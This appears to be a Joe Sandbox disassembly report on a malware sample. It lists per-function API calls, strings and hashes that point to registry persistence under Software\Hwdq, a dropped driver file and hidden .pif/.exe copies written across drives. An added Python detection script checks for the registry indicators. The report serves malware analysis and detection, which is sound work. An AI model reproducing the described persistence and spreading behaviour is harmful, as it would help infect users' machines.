• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: AddressProc$Sleep$ExitLibraryLoadThreadUser
• String ID: C:\Windows\system32\drivers\qijmfn.sys
• API String ID: 3711489173-3413758758
• Opcode ID: b4a57a6333c3910053e0634496715e6625a54af301c03d071a27bbf27fd5fca0
• Instruction ID: 17e69bad09318094fb0880db03648d30691ffebfd2f5d19e92a549ca336f2b05
• Opcode Fuzzy Hash: b4a57a6333c3910053e0634496715e6625a54af301c03d071a27bbf27fd5fca0
• Instruction Fuzzy Hash: F561AFB9A44204EFEB30EFB5E849B5B37B4A79CB45F20451AEB0A932B8D7705544DF20

Control-flow Graph (function at 144392d; graph image not reproduced, the API calls it references are listed under APIs below)
APIs
• Sleep.KERNEL32(00001000), ref: 01443976
• lstrcpy.KERNEL32(00000000,01432714), ref: 0144398B
• LoadLibraryA.KERNEL32(00000000), ref: 014439A2
• GetProcAddress.KERNEL32(00000000,01432700), ref: 014439C4
• FreeLibrary.KERNEL32(00000000), ref: 014439DF
• lstrcat.KERNEL32(00000000,014322B0), ref: 014439F2
• LoadLibraryA.KERNEL32(00000000), ref: 014439FF
• GetProcAddress.KERNEL32(00000000,01432700), ref: 01443A21
• CreateThread.KERNEL32(00000000,00000000,Function_00033062,00000000,00000000,00000000), ref: 01443A49
• CreateThread.KERNEL32(00000000,00000000,01441E9B,00000000,00000000,?), ref: 01443A70
• Sleep.KERNEL32(00000400), ref: 01443A84
• Sleep.KERNEL32(00000400), ref: 01443AAA
• CreateThread.KERNEL32(00000000,00000000,Function_00031CE3,0000005A,00000000,?), ref: 01443AD6
• Sleep.KERNEL32(00000400), ref: 01443AEC
• Sleep.KERNEL32(000DBBA0), ref: 01443B13
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: Sleep$CreateLibraryThread$AddressLoadProc$Freelstrcatlstrcpy
• String ID: Z
• API String ID: 4104366077-1505515367
• Opcode ID: c53e2028eb80493c675059eb35eb5f365d88ad5cc39109b24341702f77269725
• Instruction ID: a448993058485702f6cf294c25639c68f4da3f4a49cbfc13140d5c6f299a7db3
• Opcode Fuzzy Hash: c53e2028eb80493c675059eb35eb5f365d88ad5cc39109b24341702f77269725
• Instruction Fuzzy Hash: 5A517CB9E40254ABF7319B60DC09BD67774BB1CB06F00819AF34AA62A4C7F05AC4CF61

Control-flow Graph (function at 1434af0; graph image not reproduced, the API calls it references are listed under APIs below)
APIs
• lstrcpy.KERNEL32(00000000,Software\Hwdq), ref: 01434B6C
• lstrlen.KERNEL32(00000000,\%d,616E6974), ref: 01434B90
• wsprintfA.USER32 ref: 01434B9E
• RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 01434BC1
• RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 01434BDE
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: CreateOpenlstrcpylstrlenwsprintf
• String ID: Software\Hwdq$\%d$userC:\Windows\
• API String ID: 4004410694-1901203423
• Opcode ID: 554abcd1a30bf22333f9d4f5d9f41bc13e40ee4b36b45dd8977f109f74534ac9
• Instruction ID: 436e39a573e0b87887ff6171b1c581452ef31cf992b9ac88b2f347fbd51ce07d
• Opcode Fuzzy Hash: 554abcd1a30bf22333f9d4f5d9f41bc13e40ee4b36b45dd8977f109f74534ac9
• Instruction Fuzzy Hash: A0618F75904218AFDB28CF64DC49BEABB74EB9C701F0480D9E709A7254D7B09AC5CF90

Control-flow Graph (function at 14414d9; graph image not reproduced, the API calls it references are listed under APIs below)
APIs
• CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 0144151A
• GlobalAlloc.KERNEL32(00000040,?), ref: 01441542
• ReadFile.KERNEL32(?,?,?,?,00000000), ref: 01441563
• lstrlen.KERNEL32(014121A4), ref: 0144156E
• lstrlen.KERNEL32(014121A4), ref: 014415A2
• lstrlen.KERNEL32(01432654,?), ref: 0144160C
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0144164E
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 01441672
• SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0144168D
• SetEndOfFile.KERNEL32(?), ref: 0144169A
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$lstrlen$Pointer$AllocCreateGlobalReadWrite
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3635920088-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d5216fe7dd22966f3e161ec1fbd0b6c5b714319afe65d0db2059c88293f962f3
                                                                                                                                                                                                                                                                                            • Instruction ID: 5d61e9315269f5ab948f86957a79365c4e5f689a97c64b9aeca857ccb886599f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5216fe7dd22966f3e161ec1fbd0b6c5b714319afe65d0db2059c88293f962f3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE613375A00218EBDB24DFA4DD49FDEB774AB58B01F108185F709A7294D7B4AB80CF91

Control-flow Graph (rendered graph not preserved in the text export; summary of what the node labels carry): function 01436330 to 01436980. The entry block calls RtlEnterCriticalSection and every path exits through the block at 0143695b that calls RtlLeaveCriticalSection. Intermediate blocks call IsBadWritePtr, wsprintfA, lstrlen, lstrcpy, GlobalAlloc and GlobalFree, with subcalls to 1448060, 144772b, 1434145, 14342ec, 14343c5, 14347bb, 14354a2 and 1434af0. The executed / not executed colouring of the blocks is not recoverable from the text.
APIs
• RtlEnterCriticalSection.NTDLL(01449050), ref: 014363CD
• IsBadWritePtr.KERNEL32(?,-00000008), ref: 01436741
• wsprintfA.USER32 ref: 014367A0
• lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 014367B7
• GlobalFree.KERNEL32(00000000), ref: 0143686F
• GlobalAlloc.KERNEL32(00000040,?), ref: 01436883
• RtlLeaveCriticalSection.NTDLL(01449050), ref: 01436960
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: CriticalGlobalSection$AllocEnterFreeLeaveWritelstrlenwsprintf
• String ID: purity_control_%x$purity_control_%x
• API String ID: 2588801185-2962537068
• Opcode ID: 29e00684a9520dd8bde079204b997868207176a8f3ce8c07ec7fd2daf639ae66
• Instruction ID: 09e2ea9813b30c4a409338e3a83654349e5020e37dd9303bef7f3f6a5e6e1593
• Opcode Fuzzy Hash: 29e00684a9520dd8bde079204b997868207176a8f3ce8c07ec7fd2daf639ae66
• Instruction Fuzzy Hash: DA028171904219ABDB24CF14CC90FEA7776BFD9344F0481A9E6499B364D732AB91CF90

Control-flow Graph (rendered graph not preserved in the text export; summary of what the node labels carry): function 01435760 to 01435c05. The block at 14357f1 calls lstrcpy and RegOpenKeyExA; on failure 1435832 calls RegCreateKeyA. The loop at 1435872 calls RegEnumValueA and, through 14358ad, RegDeleteValueA. Later blocks call wsprintfA with RegQueryValueExA (1435ad0) and wsprintfA with RegSetValueExA (1435962 / 1435a01); the block at 1435bf4 calls RegCloseKey before the common exit at 1435c01. Note that RegDeleteValueA, RegQueryValueExA and RegSetValueExA appear only in the graph, not in the APIs list below. The executed / not executed colouring of the blocks is not recoverable from the text.
APIs
• lstrcpy.KERNEL32(00000000,Software\Hwdq), ref: 014357FD
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 0143581D
• RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 01435845
• RegEnumValueA.KERNEL32(00000000,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 01435896
• RegCloseKey.KERNEL32(00000000), ref: 01435BFB
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: CloseCreateEnumOpenValuelstrcpy
• String ID: %c%d_%d$%c%d_%d$Software\Hwdq$userC:\Windows\
• API String ID: 4133318789-168572953
• Opcode ID: 799ca4b2612067faabf29ecfc141e94f1d288156026532b6058e392a42438688
• Instruction ID: 29a0594a25528c37fd766696fe85a1576c1fc416f5dd520cdc7f0bec0d5efa00
• Opcode Fuzzy Hash: 799ca4b2612067faabf29ecfc141e94f1d288156026532b6058e392a42438688
• Instruction Fuzzy Hash: F3C109B4904228DBDB24DF54DD88BE9B7B5BB9C304F1082DAD509AB2A0D7749BC5CF90
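Host check derived from the function above. This is an added example, not part of the Joe Sandbox report and not code from the sample: the report shows the function opening HKEY_CURRENT_USER (80000001) at "Software\Hwdq", walking its values with RegEnumValueA and building value names with the format "%c%d_%d" (one arbitrary character, a number, an underscore, a number). The key path and the value-name shape below are taken from those strings; the function names, the constructed sample values and the decision to treat matching names as the indicator are assumptions made for this example. The live registry read only works on Windows; elsewhere the script runs against the constructed sample so the matcher can be exercised offline.

```python
"""Check HKCU\\Software\\Hwdq for value names of the shape "%c%d_%d".

Added example based on the strings in the report (key "Software\\Hwdq" under
HKEY_CURRENT_USER, value-name format "%c%d_%d"). Everything else here is an
assumption for illustration, not behaviour confirmed by the report.
"""
import re
import sys
from typing import Dict, List, Optional

# "%c%d_%d" as used with wsprintfA: any single character, digits, "_", digits.
VALUE_NAME_RE = re.compile(r"^.\d+_\d+$")

# Key path seen in the lstrcpy / RegOpenKeyExA calls of the function.
OBSERVED_KEY = r"Software\Hwdq"


def is_sality_style_name(name: str) -> bool:
    """True if a registry value name matches the %c%d_%d format."""
    return VALUE_NAME_RE.fullmatch(name) is not None


def triage_values(values: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Split a {value name: data} mapping into matching and non-matching names.

    Names are returned sorted so the result does not depend on the order in
    which the registry (or a dict) enumerated them.
    """
    matched = sorted(n for n in values if is_sality_style_name(n))
    other = sorted(n for n in values if not is_sality_style_name(n))
    return {"matched": matched, "other": other}


def read_key_values(subkey: str = OBSERVED_KEY) -> Optional[Dict[str, object]]:
    """Enumerate the values of HKCU\\<subkey>.

    Mirrors the RegOpenKeyExA + RegEnumValueA loop of the function using the
    winreg module. Returns None when not on Windows or when the key is absent,
    which is the expected result on a clean host.
    """
    if sys.platform != "win32":
        return None
    import winreg  # only importable on Windows
    try:
        key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, subkey)
    except OSError:
        return None
    values: Dict[str, object] = {}
    with key:
        index = 0
        while True:
            try:
                name, data, _type = winreg.EnumValue(key, index)
            except OSError:
                break  # ERROR_NO_MORE_ITEMS ends the enumeration
            values[name] = data
            index += 1
    return values


# Constructed sample (assumption): what an enumeration of the key might return.
# The data bytes are placeholders and carry no meaning.
SAMPLE_VALUES: Dict[str, bytes] = {
    "A1_0": b"\x00" * 8,   # matches %c%d_%d
    "A1_1": b"\x00" * 8,   # matches %c%d_%d
    "-2_0": b"\x00" * 8,   # matches: %c may be any character
    "Config": b"\x01",     # does not match
    "A_1": b"",            # does not match: no digits before "_"
    "AB1_2": b"",          # does not match: two characters before the digits
}

if __name__ == "__main__":
    live = read_key_values()
    source = "HKCU\\" + OBSERVED_KEY if live is not None else "constructed sample"
    result = triage_values(live if live is not None else SAMPLE_VALUES)
    print(f"[{source}] value names matching %c%d_%d: {result['matched']}")
    print(f"[{source}] other value names: {result['other']}")
```

On a Windows host the script reports the live contents of the key; any value name matching the format, or the mere presence of the key, is worth correlating with the other behaviour listed in the report before drawing conclusions, since the key name alone is a single-sample string.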

Control-flow Graph (no graph present in the text export for this function)

APIs
• SetErrorMode.KERNEL32(00008002), ref: 0144457F
• WSAStartup.WS2_32(00000002,?), ref: 0144458E
• RtlInitializeCriticalSection.NTDLL(01449030), ref: 01444599
• RtlInitializeCriticalSection.NTDLL(01449018), ref: 014445A4
• RtlInitializeCriticalSection.NTDLL(01449050), ref: 014445AF
  • Part of subcall function 01443B60: LoadLibraryA.KERNEL32(01432154), ref: 01443C13
  • Part of subcall function 01443B60: GetProcAddress.KERNEL32(00000000,0143278C), ref: 01443C36
  • Part of subcall function 01443B60: GetProcAddress.KERNEL32(00000000,014327A0), ref: 01443C4E
  • Part of subcall function 01443B60: GetProcAddress.KERNEL32(00000000,014327B0), ref: 01443C67
  • Part of subcall function 01443B60: LoadLibraryA.KERNEL32(01432894), ref: 01443C79
  • Part of subcall function 01443B60: GetProcAddress.KERNEL32(00000000,014328D8), ref: 01443C9C
                                                                                                                                                                                                                                                                                              • Part of subcall function 01443B60: GetProcAddress.KERNEL32(00000000,014328B0), ref: 01443CB5
                                                                                                                                                                                                                                                                                              • Part of subcall function 01443B60: GetProcAddress.KERNEL32(00000000,014328C4), ref: 01443CCD
                                                                                                                                                                                                                                                                                              • Part of subcall function 01443B60: GetProcAddress.KERNEL32(00000000,014328A0), ref: 01443CE6
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000327D4,00000000,00000000,00000000), ref: 014445D2
                                                                                                                                                                                                                                                                                              • Part of subcall function 014341C6: RtlEnterCriticalSection.NTDLL(01449030), ref: 014341D6
                                                                                                                                                                                                                                                                                              • Part of subcall function 014341C6: RtlLeaveCriticalSection.NTDLL(01449030), ref: 01434260
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00029EEA,00000000,00000000,?), ref: 014445F9
                                                                                                                                                                                                                                                                                              • Part of subcall function 014341C6: CloseHandle.KERNEL32(00000000,?,?,01441722,00000000), ref: 01434247
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0003392D,00000000,00000000,?), ref: 01444620
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00028962,00000000,00000000,?), ref: 01444647
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0002A2F5,00000000,00000000,?), ref: 0144466E
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0002426A,00000000,00000000,?), ref: 01444695
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00027A3A,00000000,00000000,?), ref: 014446BC
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000283C9,00000000,00000000,?), ref: 014446E3
                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0002878B,00000000,00000000,?), ref: 0144470A
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000200), ref: 01444727
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateThread$AddressProc$CriticalSection$Initialize$LibraryLoad$CloseEnterErrorHandleLeaveModeSleepStartup
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3135310872-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 78695856b24a3b3870a7550c941d086aba9a8074139cb4e0e5b3191ba2b67db0
                                                                                                                                                                                                                                                                                            • Instruction ID: 1530387acd2be854770e0b9e681951d56c01d2f9f6e6b3267306689d6cf44e10
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78695856b24a3b3870a7550c941d086aba9a8074139cb4e0e5b3191ba2b67db0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E4100B2BD03447BF670A7E19C1BFD977289B69F01F24015AB709BD0E4DAF02644876A
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00004E20), ref: 01443210
                                                                                                                                                                                                                                                                                            • GetLogicalDrives.KERNEL32 ref: 01443220
                                                                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 014432A3
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,01432740), ref: 014432CA
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 014432E6
                                                                                                                                                                                                                                                                                            • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0144331B
                                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0144332F
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 01443391
                                                                                                                                                                                                                                                                                            • CharLowerA.USER32(?), ref: 0144339E
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 014433AB
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 01443479
                                                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 01443486
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 01443498
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 014434B4
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 014434E7
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 014434F4
                                                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000007), ref: 01443503
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0144351C
                                                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 01443529
                                                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000020), ref: 01443547
                                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 01443554
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0144357F
                                                                                                                                                                                                                                                                                            • GetSystemTime.KERNEL32(?), ref: 0144359F
                                                                                                                                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 014435C8
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,.pif), ref: 0144362B
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,.exe), ref: 0144363F
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,?,00000000), ref: 0144366B
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000), ref: 01443680
                                                                                                                                                                                                                                                                                            • SetFileTime.KERNEL32(?,?,?,?), ref: 014436A2
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 014436AF
                                                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000007), ref: 014436BE
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 014436DA
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 0144370D
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0144371A
                                                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000007), ref: 01443729
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001B58), ref: 01443739
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Time$Attributes$CloseHandle$Create$SystemWritelstrcat$Sleeplstrlen$CharDeleteDriveDrivesLogicalLowerReadTypelstrcpy
                                                                                                                                                                                                                                                                                            • String ID: :$\
                                                                                                                                                                                                                                                                                            • API String ID: 3104407473-1166558509
APIs
• CreateFileA.KERNEL32(C:\Windows\ueqe.log,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01435637
• GetFileSize.KERNEL32(000000FF,00000000), ref: 01435659
• GlobalAlloc.KERNEL32(00000040,00000000), ref: 01435691
• ReadFile.KERNEL32(000000FF,00000000,00000400,00000000,00000000), ref: 014356BB
• lstrcpy.KERNEL32(00000000,C:\Windows\ueqe.log), ref: 014356CD
• lstrlen.KERNEL32(00000000,00000000), ref: 014356E1
• CloseHandle.KERNEL32(000000FF), ref: 01435725
• GlobalFree.KERNEL32(00000000), ref: 01435755
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: File$Global$AllocCloseCreateFreeHandleReadSizelstrcpylstrlen
• String ID: C:\Windows\ueqe.log
• API String ID: 1499523542-2585761192
APIs
• GetTickCount.KERNEL32 ref: 0143A599
• GetPrivateProfileStringA.KERNEL32(01432114,01432660,00000000,00000000,00000080,014326C0), ref: 0143A5C5
• lstrlen.KERNEL32(00000000), ref: 0143A5D2
• GetTickCount.KERNEL32 ref: 0143A5EA
• wsprintfA.USER32 ref: 0143A635
• WritePrivateProfileStringA.KERNEL32(01432114,01432660,?,014326C0), ref: 0143A65A
• lstrcpy.KERNEL32(67320627207,00000000), ref: 0143A66C
Strings
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
Similarity
• API ID: CountPrivateProfileStringTick$Writelstrcpylstrlenwsprintf
• String ID: 67320627207
• API String ID: 929466507-2104150523
APIs
• Sleep.KERNEL32(0002BF20), ref: 01438A14
  • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
• Sleep.KERNEL32 ref: 01438A33
• IsBadWritePtr.KERNEL32(00000110,?), ref: 01438B3E
• Sleep.KERNEL32(00001770), ref: 01438B8E
• Sleep.KERNEL32(0001D4C0), ref: 01438BB0
• Sleep.KERNEL32(004B001E), ref: 01438D9D
• RtlExitUserThread.NTDLL(00000000), ref: 01438DD0
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
Similarity
• API ID: Sleep$ExchangeExitInterlockedThreadUserWrite
• String ID:
• API String ID: 702981705-0
APIs
• Sleep.KERNEL32(000493E0), ref: 014387D1
• CreateThread.KERNEL32(00000000,00000000,Function_000284C1,00000000,00000000,00000000), ref: 0143885C
  • Part of subcall function 014341C6: RtlEnterCriticalSection.NTDLL(01449030), ref: 014341D6
  • Part of subcall function 014341C6: RtlLeaveCriticalSection.NTDLL(01449030), ref: 01434260
• Sleep.KERNEL32(00000200), ref: 01438870
• Sleep.KERNEL32(00000100), ref: 01438884
• Sleep.KERNEL32(00000100), ref: 0143889F
• Sleep.KERNEL32(00000400), ref: 014388BD
• Sleep.KERNEL32(00249F00), ref: 014388D7
• RtlExitUserThread.NTDLL(00000000), ref: 014388E4
Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
